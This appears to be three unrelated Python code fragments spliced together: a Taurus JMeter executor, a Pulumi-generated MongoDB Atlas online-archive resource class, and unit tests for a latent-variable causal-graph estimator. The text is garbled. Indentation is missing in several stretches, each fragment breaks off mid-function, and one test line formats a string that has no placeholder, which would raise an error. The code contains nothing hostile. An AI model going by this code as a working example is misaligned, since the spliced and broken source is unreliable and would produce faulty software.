    self.__add_listener(jmx.new_kpi_listener(self.kpi_jtl, kpi_flags), jmx)
    verbose = self.engine.config.get(SETTINGS).get("verbose", False)
    jtl_log_level = self.execution.get('write-xml-jtl', "full" if verbose else 'error')
    xml_flags = self.settings.get('xml-jtl-flags')
    if jtl_log_level == 'error':
        self.log_jtl = self.engine.create_artifact("error", ".jtl")
        self.__add_listener(jmx.new_xml_listener(self.log_jtl, False, xml_flags), jmx)
    elif jtl_log_level == 'full':
        self.log_jtl = self.engine.create_artifact("trace", ".jtl")
        self.__add_listener(jmx.new_xml_listener(self.log_jtl, True, xml_flags), jmx)
def __force_tran_parent_sample(self, jmx):
    """Make TransactionControllers generate parent samples when configured."""
    if self.get_scenario().get("force-parent-sample", True):
        self.log.debug("Enforcing parent sample for transaction controller")
        sel = 'TransactionController > boolProp[name="TransactionController.parent"]'
        jmx.set_text(sel, 'true')
def __get_modified_jmx(self, original, is_jmx_generated):
    """
    add two listeners to test plan:
    - to collect basic stats for KPIs
    - to collect detailed errors/trace info
    :return: path to artifact
    """
    # NOTE(review): despite the docstring, this returns the JMX object
    # itself, not a path — confirm against callers
    self.log.debug("Load: %s", self.get_specific_load())
    jmx = JMX(original)
    # file-writing listeners are disabled unless running in GUI mode
    if self.get_scenario().get("disable-listeners", not self.settings.get("gui", False)):
        JMeterExecutor.__disable_listeners(jmx)
    user_def_vars = self.get_scenario().get("variables")
    if user_def_vars:
        jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, jmx.add_user_def_vars_elements(user_def_vars))
        jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, etree.Element("hashTree"))
    headers = self.get_scenario().get_headers()
    if headers:
        jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, JMX._get_header_mgr(headers))
        jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, etree.Element("hashTree"))
    self.__apply_test_mode(jmx)
    self.__add_result_listeners(jmx)
    # fixes below only apply to user-provided (not generated) scripts
    if not is_jmx_generated:
        self.__force_tran_parent_sample(jmx)
        version = LooseVersion(str(self.settings.get('version', self.JMETER_VER)))
        if version >= LooseVersion("3.2"):
            self.__force_hc4_cookie_handler(jmx)
    self.__fill_empty_delimiters(jmx)
    self.__apply_modifications(jmx)
    # load profile (concurrency/ramp-up/etc.) is applied last
    LoadSettingsProcessor(self).modify(jmx)
    return jmx
def __force_hc4_cookie_handler(self, jmx):
    """
    Pin CookieManagers without an explicit implementation to the HC4
    handler (needed for JMeter 3.2+).
    :param jmx: JMX
    """
    fix_counter = 0
    for node in jmx.get("[testclass=CookieManager]"):
        prop_name = "CookieManager.implementation"
        if not node.get(prop_name):
            val = "org.apache.jmeter.protocol.http.control.HC4CookieHandler"
            node.append(JMX._string_prop(prop_name, val))
            fix_counter += 1
    if fix_counter:
        # FIX: lazy %-style log args, consistent with the rest of the module
        self.log.info('%s obsolete CookieManagers are found and fixed', fix_counter)
def __save_modified_jmx(self, jmx, original_jmx_path, is_jmx_generated):
    """Persist the modified JMX; next to the original script, or as an artifact."""
    base, _ = os.path.splitext(os.path.basename(original_jmx_path))
    modified_name = "modified_" + base
    if is_jmx_generated:
        target = self.engine.create_artifact(modified_name, ".jmx")
    else:
        script_dir = get_full_path(original_jmx_path, step_up=1)
        target = get_uniq_name(script_dir, modified_name, ".jmx")
    jmx.save(target)
    return target
def __jmx_from_requests(self):
    """
    Generate a jmx file from the scenario's requests.
    :return: path to the generated script
    """
    target = self.engine.create_artifact("requests", ".jmx")
    builder = JMeterScenarioBuilder(self)
    builder.save(target)
    # the builder may have accumulated system properties to pass to JMeter
    self.settings.merge(builder.system_props)
    return target
@staticmethod
def __write_props_to_file(file_path, params):
    """
    Write key=value properties into `file_path`, one pair per line.
    :param file_path: destination file
    :param params: mapping of property names to values
    """
    lines = ["%s=%s\n" % (key, val) for key, val in iteritems(params)]
    with open(file_path, 'w') as fds:
        fds.writelines(lines)
def get_widget(self):
    """
    Add progress widget to console screen sidebar

    Lazily creates the widget on first call and reuses it afterwards.
    :return: ExecutorWidget
    """
    if not self.widget:
        label = "%s" % self
        # assumes str(self) contains a '/' separator — would raise
        # IndexError otherwise; TODO confirm against the executor's __str__
        self.widget = ExecutorWidget(self, "JMeter: " + label.split('/')[1])
    return self.widget
def __modify_resources_paths_in_jmx(self, jmx, file_list):
    """
    Rewrite resource file paths inside the jmx etree to bare basenames.
    :param jmx: etree root to modify
    :param file_list: list of paths to look for
    """
    missed_files = []
    for filename in set(file_list):
        matches = jmx.xpath('//stringProp[text()="%s"]' % filename)
        if not matches:
            missed_files.append(filename)
        basename = os.path.basename(filename)
        for element in matches:
            self.log.debug("Replacing JMX path %s with %s", element.text, basename)
            element.text = basename
    if missed_files:
        self.log.warning("Files not found in JMX: %s", missed_files)
def _resolve_jmx_relpaths(self, resource_files_from_jmx):
    """
    Attempt to resolve paths relative to the JMX script itself.
    :param resource_files_from_jmx: paths as found in the JMX
    :return: list of (possibly rebased) paths
    """
    script_basedir = os.path.dirname(get_full_path(self.original_jmx))
    resolved = []
    for res_file in resource_files_from_jmx:
        candidate = os.path.join(script_basedir, res_file)
        if not os.path.exists(res_file) and os.path.exists(candidate):
            self.log.info("Resolved resource file with path relative to JMX: %s", candidate)
            resolved.append(candidate)
        else:
            resolved.append(res_file)
    return resolved
def resource_files(self):
    """
    Get list of resource files, modify jmx file paths if necessary

    Collects resources referenced by the scenario; when a JMX script is
    configured, also collects files referenced inside it, rewrites those
    references to bare basenames, and makes the rewritten artifact copy
    the active script.
    :return: list of file paths
    """
    # get all resource files from requests
    scenario = self.get_scenario()
    resource_files = self.res_files_from_scenario(scenario)
    self.original_jmx = self.get_script_path()
    if self.original_jmx:
        jmx = JMX(self.original_jmx)
        resource_files_from_jmx = JMeterExecutor.__get_resource_files_from_jmx(jmx)
        if resource_files_from_jmx:
            execution_files = self.execution.get('files', [], force_set=True)
            execution_files.extend(self._resolve_jmx_relpaths(resource_files_from_jmx))
            # rewrite paths in a copy of the script and switch to that copy
            self.__modify_resources_paths_in_jmx(jmx.tree, resource_files_from_jmx)
            script_name, script_ext = os.path.splitext(os.path.basename(self.original_jmx))
            self.original_jmx = self.engine.create_artifact(script_name, script_ext)
            jmx.save(self.original_jmx)
            scenario[Scenario.SCRIPT] = self.original_jmx
    # the (possibly replaced) script itself is also a resource
    script = self.get_scenario().get(Scenario.SCRIPT, None)
    if script:
        resource_files.append(script)
    return resource_files
@staticmethod
def __get_resource_files_from_jmx(jmx):
    """
    Get list of resource files paths from jmx scenario
    :return: (file list)
    """
    resource_files = []
    # listener/collector classes whose file props are outputs, not inputs
    exclude_elements = ['kg.apc.jmeter.jmxmon.JMXMonCollector', 'JSR223Listener',
                        'kg.apc.jmeter.vizualizers.CorrectedResultCollector',
                        'kg.apc.jmeter.reporters.FlexibleFileWriter', 'BSFListener',
                        'kg.apc.jmeter.dbmon.DbMonCollector', 'BeanShellListener', 'MailerResultCollector',
                        'kg.apc.jmeter.perfmon.PerfMonCollector', 'ResultCollector',
                        'kg.apc.jmeter.vizualizers.CompositeResultCollector',
                        'kg.apc.jmeter.reporters.LoadosophiaUploader']
    # property names that typically carry input file paths
    search_patterns = ["File.path", "filename", "BeanShellSampler.filename"]
    for pattern in search_patterns:
        resource_elements = jmx.tree.findall(".//stringProp[@name='%s']" % pattern)
        for resource_element in resource_elements:
            # check if none of parents are disabled
            parent = resource_element.getparent()
            parent_disabled = False
            while parent is not None:  # ?
                if parent.get('enabled') == 'false' or parent.tag in exclude_elements:
                    parent_disabled = True
                    break
                parent = parent.getparent()
            # skip empty values, disabled/excluded subtrees and ${var}-templated paths
            if resource_element.text and not parent_disabled and not has_variable_pattern(resource_element.text):
                resource_files.append(resource_element.text)
    return resource_files
def res_files_from_scenario(self, scenario):
    """Collect resource files referenced by data-sources and requests."""
    files = []
    for data_source in (scenario.data.get('data-sources') or []):
        if isinstance(data_source, string_types):
            files.append(data_source)
        elif isinstance(data_source, dict):
            files.append(data_source['path'])
    for req in scenario.get_requests():
        files.extend(self.res_files_from_request(req))
    self.resource_files_collector.clear_path_cache()
    return files
def res_files_from_request(self, request):
    """Return resource files used by one request (collector created lazily)."""
    if self.resource_files_collector is None:
        self.resource_files_collector = ResourceFilesCollector(self)
    collector = self.resource_files_collector
    return collector.visit(request)
def __apply_modifications(self, jmx):
    """
    Apply scenario "modifications" (enable / disable / set-prop) to the JMX.
    :type jmx: JMX
    """
    modifs = self.get_scenario().get("modifications")
    # NOTE(review): assumes get() yields a dict-like even when the key is
    # absent — otherwise `'disable' in modifs` would raise; confirm
    # Scenario.get's default behavior
    if 'disable' in modifs:
        self.__apply_enable_disable(modifs, 'disable', jmx)
    if 'enable' in modifs:
        self.__apply_enable_disable(modifs, 'enable', jmx)
    if 'set-prop' in modifs:
        items = modifs['set-prop']
        for path, text in iteritems(items):
            # selector path format: "TestName>prop1>prop2..."
            parts = path.split('>')
            if len(parts) < 2:
                raise TaurusConfigError("JMeter: property selector must have at least 2 levels")
            sel_parts = ["[testname='%s']" % parts[0]]  # TODO: support wildcards in element names
            for add in parts[1:]:
                sel_parts.append("[name='%s']" % add)
            selector = '>'.join(sel_parts)
            # update an existing prop; otherwise append a new one to the parent
            if not jmx.set_text(selector, text):
                selector = '>'.join(sel_parts[:-1])
                if jmx.get(selector):
                    jmx.append(selector, JMX._string_prop(parts[-1], text))
                else:
                    self.log.warning("No elements matched for set-prop: %s", path)
def __apply_enable_disable(self, modifs, action, jmx):
    """Enable or disable every element whose testname matches the patterns."""
    items = modifs[action]
    if not isinstance(items, list):
        # normalize a single value to a list, in place
        modifs[action] = [items]
        items = modifs[action]
    enable = (action == 'enable')
    for pattern in items:
        for candidate in jmx.get("[testname]"):
            testname = candidate.get('testname')
            if fnmatch.fnmatch(testname, pattern):
                jmx.set_enabled("[testname='%s']" % testname, enable)
def install_required_tools(self):
    """
    check tools

    Ensures Java and the Tcl library are present, then resolves the
    configured JMeter version/path and installs JMeter when missing.
    """
    required_tools = [JavaVM(self.log), TclLibrary(self.log)]
    for tool in required_tools:
        if not tool.check_if_installed():
            tool.install()
    # force_set so later reads observe the effective defaults
    jmeter_version = self.settings.get("version", JMeterExecutor.JMETER_VER, force_set=True)
    jmeter_path = self.settings.get("path", "~/.bzt/jmeter-taurus/{version}/", force_set=True)
    jmeter_path = get_full_path(jmeter_path)
    download_link = self.settings.get("download-link", None)
    plugins = self.settings.get("plugins", [])
    proxy = self.engine.config.get('settings').get('proxy')
    self.tool = JMeter(jmeter_path, self.log, jmeter_version, download_link, plugins, proxy)
    if self._need_to_install(self.tool):
        self.tool.install()
    # record the resolved tool location back into settings
    self.settings['path'] = self.tool.tool_path
@staticmethod
def _need_to_install(tool):
end_str_l = os.path.join('bin', 'jmeter' + EXE_SUFFIX)
end_str_s = os.path.join('bin', 'jmeter')
if os.path.isfile(tool.tool_path):
if tool.check_if_installed(): # all ok, it's really tool path
return False
else: # probably it's path to other tool)
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OnlineArchiveArgs', 'OnlineArchive']
@pulumi.input_type
class OnlineArchiveArgs:
    # Generated by the Pulumi Terraform Bridge — documentation-only edits here.
    def __init__(__self__, *,
                 cluster_name: pulumi.Input[str],
                 coll_name: pulumi.Input[str],
                 criteria: pulumi.Input['OnlineArchiveCriteriaArgs'],
                 db_name: pulumi.Input[str],
                 project_id: pulumi.Input[str],
                 partition_fields: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]] = None,
                 paused: Optional[pulumi.Input[bool]] = None,
                 sync_creation: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a OnlineArchive resource.
        :param pulumi.Input[str] cluster_name: Name of the cluster that contains the collection.
        :param pulumi.Input[str] coll_name: Name of the collection.
        :param pulumi.Input['OnlineArchiveCriteriaArgs'] criteria: Criteria to use for archiving data.
        :param pulumi.Input[str] db_name: Name of the database that contains the collection.
        :param pulumi.Input[str] project_id: The unique ID for the project
        :param pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]] partition_fields: Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
        :param pulumi.Input[bool] paused: State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
        :param pulumi.Input[bool] sync_creation: Presumably makes resource creation wait for the archive to be ready — undocumented in the generated source; confirm against the provider docs.
        """
        pulumi.set(__self__, "cluster_name", cluster_name)
        pulumi.set(__self__, "coll_name", coll_name)
        pulumi.set(__self__, "criteria", criteria)
        pulumi.set(__self__, "db_name", db_name)
        pulumi.set(__self__, "project_id", project_id)
        if partition_fields is not None:
            pulumi.set(__self__, "partition_fields", partition_fields)
        if paused is not None:
            pulumi.set(__self__, "paused", paused)
        if sync_creation is not None:
            pulumi.set(__self__, "sync_creation", sync_creation)

    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> pulumi.Input[str]:
        """
        Name of the cluster that contains the collection.
        """
        return pulumi.get(self, "cluster_name")

    @cluster_name.setter
    def cluster_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "cluster_name", value)

    @property
    @pulumi.getter(name="collName")
    def coll_name(self) -> pulumi.Input[str]:
        """
        Name of the collection.
        """
        return pulumi.get(self, "coll_name")

    @coll_name.setter
    def coll_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "coll_name", value)

    @property
    @pulumi.getter
    def criteria(self) -> pulumi.Input['OnlineArchiveCriteriaArgs']:
        """
        Criteria to use for archiving data.
        """
        return pulumi.get(self, "criteria")

    @criteria.setter
    def criteria(self, value: pulumi.Input['OnlineArchiveCriteriaArgs']):
        pulumi.set(self, "criteria", value)

    @property
    @pulumi.getter(name="dbName")
    def db_name(self) -> pulumi.Input[str]:
        """
        Name of the database that contains the collection.
        """
        return pulumi.get(self, "db_name")

    @db_name.setter
    def db_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "db_name", value)

    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Input[str]:
        """
        The unique ID for the project
        """
        return pulumi.get(self, "project_id")

    @project_id.setter
    def project_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "project_id", value)

    @property
    @pulumi.getter(name="partitionFields")
    def partition_fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]:
        """
        Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
        """
        return pulumi.get(self, "partition_fields")

    @partition_fields.setter
    def partition_fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]):
        pulumi.set(self, "partition_fields", value)

    @property
    @pulumi.getter
    def paused(self) -> Optional[pulumi.Input[bool]]:
        """
        State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
        """
        return pulumi.get(self, "paused")

    @paused.setter
    def paused(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "paused", value)

    @property
    @pulumi.getter(name="syncCreation")
    def sync_creation(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "sync_creation")

    @sync_creation.setter
    def sync_creation(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "sync_creation", value)
@pulumi.input_type
class _OnlineArchiveState:
def __init__(__self__, *,
archive_id: Optional[pulumi.Input[str]] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
coll_name: Optional[pulumi.Input[str]] = None,
criteria: Optional[pulumi.Input['OnlineArchiveCriteriaArgs']] = None,
db_name: Optional[pulumi.Input[str]] = None,
partition_fields: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]] = None,
paused: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
sync_creation: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering OnlineArchive resources.
:param pulumi.Input[str] archive_id: ID of the online archive.
:param pulumi.Input[str] cluster_name: Name of the cluster that contains the collection.
:param pulumi.Input[str] coll_name: Name of the collection.
:param pulumi.Input['OnlineArchiveCriteriaArgs'] criteria: Criteria to use for archiving data.
:param pulumi.Input[str] db_name: Name of the database that contains the collection.
:param pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]] partition_fields: Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
:param pulumi.Input[bool] paused: State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
:param pulumi.Input[str] project_id: The unique ID for the project
:param pulumi.Input[str] state: Status of the online archive. Valid values are: Pending, Archiving, Idle, Pausing, Paused, Orphaned and Deleted
"""
if archive_id is not None:
pulumi.set(__self__, "archive_id", archive_id)
if cluster_name is not None:
pulumi.set(__self__, "cluster_name", cluster_name)
if coll_name is not None:
pulumi.set(__self__, "coll_name", coll_name)
if criteria is not None:
pulumi.set(__self__, "criteria", criteria)
if db_name is not None:
pulumi.set(__self__, "db_name", db_name)
if partition_fields is not None:
pulumi.set(__self__, "partition_fields", partition_fields)
if paused is not None:
pulumi.set(__self__, "paused", paused)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if state is not None:
pulumi.set(__self__, "state", state)
if sync_creation is not None:
pulumi.set(__self__, "sync_creation", sync_creation)
@property
@pulumi.getter(name="archiveId")
def archive_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the online archive.
"""
return pulumi.get(self, "archive_id")
@archive_id.setter
def archive_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "archive_id", value)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the cluster that contains the collection.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="collName")
def coll_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the collection.
"""
return pulumi.get(self, "coll_name")
@coll_name.setter
def coll_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "coll_name", value)
@property
@pulumi.getter
def criteria(self) -> Optional[pulumi.Input['OnlineArchiveCriteriaArgs']]:
"""
Criteria to use for archiving data.
"""
return pulumi.get(self, "criteria")
@criteria.setter
def criteria(self, value: Optional[pulumi.Input['OnlineArchiveCriteriaArgs']]):
pulumi.set(self, "criteria", value)
@property
@pulumi.getter(name="dbName")
def db_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database that contains the collection.
"""
return pulumi.get(self, "db_name")
@db_name.setter
def db_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_name", value)
@property
@pulumi.getter(name="partitionFields")
def partition_fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]:
    """
    Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
    """
    value = pulumi.get(self, "partition_fields")
    return value

@partition_fields.setter
def partition_fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]):
    """Setter for ``partition_fields``."""
    pulumi.set(self, "partition_fields", value)
@property
@pulumi.getter
def paused(self) -> Optional[pulumi.Input[bool]]:
    """
    State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
    """
    value = pulumi.get(self, "paused")
    return value

@paused.setter
def paused(self, value: Optional[pulumi.Input[bool]]):
    """Setter for ``paused``."""
    pulumi.set(self, "paused", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
    """
    The unique ID for the project
    """
    value = pulumi.get(self, "project_id")
    return value

@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
    """Setter for ``project_id``."""
    pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
    """
    Status of the online archive. Valid values are: Pending, Archiving, Idle, Pausing, Paused, Orphaned and Deleted
    """
    value = pulumi.get(self, "state")
    return value

@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
    """Setter for ``state``."""
    pulumi.set(self, "state", value)
@property
@pulumi.getter(name="syncCreation")
def sync_creation(self) -> Optional[pulumi.Input[bool]]:
    # Generated pass-through accessor for the "syncCreation" input property.
    value = pulumi.get(self, "sync_creation")
    return value
@sync_creation.setter
| |
" diff. wrt. population B = %s" % diff_wrt_pop
thresh = 0.07
if diff_wrt_pop > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
# Check distance of estimate's score and pop. score
diff_scores = estimate_score - pop_score
text = " diff. wrt. to pop score = %s - pop. score = %s" % (
diff_scores, pop_score)
if diff_scores > 0:
print("*** (> 0)" % thresh, colored(text, 'red'))
else:
print(text)
self.assertLess(estimate_score - pop_score, 0)
# print("Population B\n",model.B)
# print("Estimated B\n", estimated_B)
mask = np.logical_not(model.A)
self.assertTrue(np.allclose(estimated_B[mask], 0))
def test_finite_sample(self):
    """For random graphs, run the alternating procedure on the true
    connectivity matrix with a finite sample.

    TEST PASSES IF:
      - estimated B respects sparsity in A
    WARNING IF:
      - score is larger than score of population parameters
      - estimated B is more than 0.07 away from population B
    """
    num_graphs = NUM_GRAPHS
    p, num_latent, e = 10, 2, 5
    var_lo, var_hi = 1, 2
    B_lo, B_hi = 0.6, 0.8
    n = 1000
    print("\n" + "-" * 70)
    print("Testing alternating procedure with a finite sample (n_e = %d)" % n)
    for g in range(num_graphs):
        print("\nGraph %d" % g)
        # Sample a ground-truth model and a finite sample from it
        model = sample_model(p, set(range(p)), num_latent,
                             e, var_lo, var_hi, B_lo, B_hi, random_state=g)
        _, sample_covariances, n_obs = model.sample(
            n, compute_covs=True, random_state=g)
        pop_score = model.score(sample_covariances, n_obs)
        score_class = Score((sample_covariances, n_obs),
                            num_latent=num_latent, psi_max=None, psi_fixed=False,
                            max_iter=1000, threshold_dist_B=1e-3,
                            threshold_fluctuation=1, max_fluctuations=10,
                            threshold_score=1e-6, learning_rate=10)
        t0 = time.time()
        fitted_model, fitted_score = score_class.score_dag(
            model.A, set(range(model.p)), verbose=0)
        print(" Done in %0.2f seconds" % (time.time() - t0))
        # Warn when the estimate is far (max-norm) from the population B
        fitted_B = fitted_model.B
        diff_wrt_pop = abs(model.B - fitted_B).max()
        text = " diff. wrt. population B = %s" % diff_wrt_pop
        thresh = 0.07
        if diff_wrt_pop > thresh:
            print("*** (> %s)" % thresh, colored(text, 'red'))
        else:
            print(text)
        # Warn when the estimate scores worse than the population parameters
        diff_scores = fitted_score - pop_score
        text = " diff. wrt. to pop score = %s - pop. score = %s" % (
            diff_scores, pop_score)
        thresh = 0
        if diff_scores > thresh:
            print("*** (> %s)" % thresh, colored(text, 'red'))
        else:
            print(text)
        # The estimate must respect the sparsity pattern of A
        mask = np.logical_not(model.A)
        self.assertTrue(np.allclose(fitted_B[mask], 0))
def test_finite_sample_latent_vs_not(self):
    """For random graphs, test the procedure on the true connectivity
    matrix, with a finite sample.

    TEST PASSES IF:
      - estimated B respects sparsity in A
      - score when using latents is better than without them
    WARNING IF:
      - L-infinity distance to population B is smaller using latents than without them
    """
    G = NUM_GRAPHS
    p = 10
    num_latent = 2
    e = 5
    var_lo, var_hi = 1, 2
    B_lo, B_hi = 0.6, 0.8
    n = 1000
    print("\n" + "-" * 70)
    # BUG FIX: this header previously read "with vs. without fixed-psi" — it
    # had been swapped with the header of test_finite_sample_psi_fixed_vs_not.
    print(
        "Testing procedure with vs. without latents on a finite sample (n_e = %d)" % n)
    for i in range(G):
        print("\nGraph %d" % i)
        # Build model and draw a finite sample from it
        model = sample_model(p, set(range(p)), num_latent, e, var_lo,
                             var_hi, B_lo, B_hi, random_state=i)
        _, sample_covariances, n_obs = model.sample(
            n, compute_covs=True, random_state=i)
        pop_score = model.score(sample_covariances, n_obs)
        start = time.time()
        # Estimate with latent variables
        score_class = Score((sample_covariances, n_obs),
                            num_latent=num_latent, psi_max=None, psi_fixed=False,
                            max_iter=1000, threshold_dist_B=1e-3,
                            threshold_fluctuation=1, max_fluctuations=10,
                            threshold_score=1e-6, learning_rate=10)
        estimated_model_latents, estimate_score_latents = score_class.score_dag(
            model.A, set(range(model.p)), verbose=0)
        # Estimate without latent variables (num_latent=0)
        score_class = Score((sample_covariances, n_obs),
                            num_latent=0, psi_max=None, psi_fixed=False,
                            max_iter=1000, threshold_dist_B=1e-3,
                            threshold_fluctuation=1, max_fluctuations=10,
                            threshold_score=1e-6, learning_rate=10)
        estimated_model_no_latents, estimate_score_no_latents = score_class.score_dag(
            model.A, set(range(model.p)), verbose=0)
        print(" Done in %0.2f seconds" % (time.time() - start))
        # Check difference in scores; using latents must score better
        diff_scores = estimate_score_latents - estimate_score_no_latents
        text = " score w. latents < score wo. latents: %s - diff = %s - pop. score = %s" % (
            estimate_score_latents < estimate_score_no_latents, diff_scores, pop_score)
        thresh = 0
        if diff_scores > thresh:
            print("*** (> %s)" % thresh, colored(text, 'red'))
        else:
            print(text)
        self.assertLess(estimate_score_latents, estimate_score_no_latents)
        # Check difference in distances to population B (estimate
        # with latents should be closer) — warning only, not asserted
        dist_B_latents = abs(estimated_model_latents.B - model.B).max()
        dist_B_no_latents = abs(
            estimated_model_no_latents.B - model.B).max()
        diff_dists = dist_B_latents - dist_B_no_latents
        text = " dist. to population B w. latents < wo. latents: %s - diff = %s" % (
            dist_B_latents < dist_B_no_latents, diff_dists)
        thresh = 0
        if diff_dists > thresh:
            print("*** (> %s)" % thresh, colored(text, 'red'))
        else:
            print(text)
        # self.assertLess(dist_B_latents, dist_B_no_latents)
        # Check sparsity is respected
        mask = np.logical_not(model.A)
        self.assertTrue(np.allclose(estimated_model_latents.B[mask], 0))
        self.assertTrue(np.allclose(estimated_model_no_latents.B[mask], 0))
def test_finite_sample_psi_fixed_vs_not(self):
    """For random graphs, test the procedure on the true connectivity
    matrix, with a finite sample.

    TEST PASSES IF:
      - estimated B respects sparsity in A
      - psis of model with fixed_psi = True are indeed all the same
      - score without constraint that hidden variances to be equal is better than with it
    WARNING IF:
      - L-infinity distance to population B is better without constraints than with fixed psi
    """
    G = NUM_GRAPHS
    p = 10
    num_latent = 2
    e = 5
    var_lo, var_hi = 1, 2
    B_lo, B_hi = 0.6, 0.8
    n = 1000
    print("\n" + "-" * 70)
    # BUG FIX: this header previously read "with vs. without latents" — it had
    # been swapped with the header of test_finite_sample_latent_vs_not.
    print(
        "Testing procedure with vs. without fixed-psi on a finite sample (n_e = %d)" % n)
    for i in range(G):
        print("\nGraph %d" % i)
        # Build model and draw a finite sample from it
        model = sample_model(p, set(range(p)), num_latent, e, var_lo,
                             var_hi, B_lo, B_hi, random_state=i)
        _, sample_covariances, n_obs = model.sample(
            n, compute_covs=True, random_state=i)
        pop_score = model.score(sample_covariances, n_obs)
        start = time.time()
        # Estimate with unconstrained latent variances (psi_fixed=False)
        score_class = Score((sample_covariances, n_obs),
                            num_latent=num_latent, psi_max=None, psi_fixed=False,
                            max_iter=1000, threshold_dist_B=1e-3,
                            threshold_fluctuation=1, max_fluctuations=10,
                            threshold_score=1e-6, learning_rate=10)
        estimated_model, estimate_score = score_class.score_dag(
            model.A, set(range(model.p)), verbose=0)
        # Estimate with all latent variances constrained equal (psi_fixed=True)
        score_class = Score((sample_covariances, n_obs),
                            num_latent=num_latent, psi_max=None, psi_fixed=True,
                            max_iter=1000, threshold_dist_B=1e-3,
                            threshold_fluctuation=1, max_fluctuations=10,
                            threshold_score=1e-6, learning_rate=10)
        estimated_model_fixed, estimate_score_fixed = score_class.score_dag(
            model.A, set(range(model.p)), verbose=0)
        print(" Done in %0.2f seconds" % (time.time() - start))
        # With psi_fixed=True all estimated latent variances must coincide
        self.assertTrue(
            (estimated_model_fixed.psis[0, :] == estimated_model_fixed.psis).all())
        # Check difference in scores; the unconstrained fit must score better
        diff_scores = estimate_score - estimate_score_fixed
        text = " score unconstrained < score fixed psi: %s - diff = %s - pop. score = %s" % (
            estimate_score < estimate_score_fixed, diff_scores, pop_score)
        thresh = 0
        if diff_scores > thresh:
            print("*** (> %s)" % thresh, colored(text, 'red'))
        else:
            print(text)
        self.assertLess(estimate_score, estimate_score_fixed)
        # Check difference in distances to population B (unconstrained
        # estimate should be closer) — warning only, not asserted
